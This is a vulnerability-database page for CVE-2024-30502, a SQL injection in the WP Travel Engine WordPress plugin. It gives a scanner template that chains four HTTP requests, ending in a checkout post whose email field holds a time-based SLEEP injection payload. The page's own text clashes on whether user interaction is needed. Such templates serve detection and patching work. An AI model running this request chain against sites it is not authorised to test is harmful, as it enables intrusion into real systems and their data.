/Vulnerability Library

WP Travel Engine <= 5.7.9 - SQL Injection

CVE-2024-30502
Verified

Description

WP Travel Engine 5.7.9 and earlier contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires user interaction.

Severity

Critical

CVSS Score

10

Exploit Probability

18%

Published Date

March 7, 2026

Template Author

shivam kamboj

CVE-2024-30502.yaml
id: CVE-2024-30502

info:
  name: WP Travel Engine <= 5.7.9 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WP Travel Engine 5.7.9 and earlier contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires user interaction.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of WP Travel Engine.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel-engine/wp-travel-engine-579-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/wp-travel-engine/vulnerability/wordpress-wp-travel-engine-plugin-5-7-9-unauth-blind-sql-injection-vulnerability
    - https://plugins.trac.wordpress.org/changeset?old_path=/wp-travel-engine/tags/5.7.9&new_path=/wp-travel-engine/tags/5.8.0&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30502
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-30502
    epss-score: 0.18426
    epss-percentile: 0.95323
    cwe-id: CWE-89
  metadata:
    max-request: 4
    verified: true
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-travel-engine,unauth

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /trip/ HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: word
        part: body
        words:
          - 'addtocart'
          - 'tripID'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: trip_id
        part: body
        group: 1
        regex:
          - 'tripID[^\w]*([0-9]+)'
        internal: true

      - type: regex
        name: addtocart_nonce
        part: body
        group: 1
        regex:
          - 'addtocart[^\w]*([a-f0-9]{8,12})'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wte_add_trip_to_cart&_nonce={{addtocart_nonce}}&cart_version=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tripID":{{trip_id}},"packageID":{{trip_id}},"tripDate":"2026-04-01","tripTime":"","travelers":1,"cartTotal":100,"pricingOptions":{"adult":{"pax":1,"cost":100,"categoryInfo":{"label":"Adult","pricingType":"per-person"}}}}

    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
        internal: true

  - raw:
      - |
        GET /wp-travel-engine-checkout/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'booking_process_nonce'
        internal: true

    extractors:
      - type: regex
        name: booking_nonce
        part: body
        group: 1
        regex:
          - 'booking_process_nonce" value="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-travel-engine-checkout/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wp_travel_engine_new_booking_process_action&wp_travel_engine_new_booking_process_nonce={{booking_nonce}}&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bfname%5D=T&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Blname%5D=U&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bemail%5D=x%40x.com'+UNION+SELECT+SLEEP(7)%23&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Baddress%5D=x&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bcity%5D=x&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bcountry%5D=US&wp_travel_engine_nw_bkg_submit=true&wpte_checkout_paymnet_method=booking_only

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206cf294f35543f4b3441ffdecbdb99775712ae351ee52b34b7957f88b1a44140202204f1f60af3e3757a905b3a1ea79e61363d3c76bec6a32cdea650a0b361f2d2ea5:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2024-30502
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel-engine/wp-travel-engine-579-unauthenticated-sql-injectionhttps://patchstack.com/database/wordpress/plugin/wp-travel-engine/vulnerability/wordpress-wp-travel-engine-plugin-5-7-9-unauth-blind-sql-injection-vulnerabilityhttps://plugins.trac.wordpress.org/changeset?old_path=/wp-travel-engine/tags/5.7.9&new_path=/wp-travel-engine/tags/5.8.0&sfp_email=&sfph_mail=https://nvd.nist.gov/vuln/detail/CVE-2024-30502

Remediation Steps

Update to the latest version of WP Travel Engine.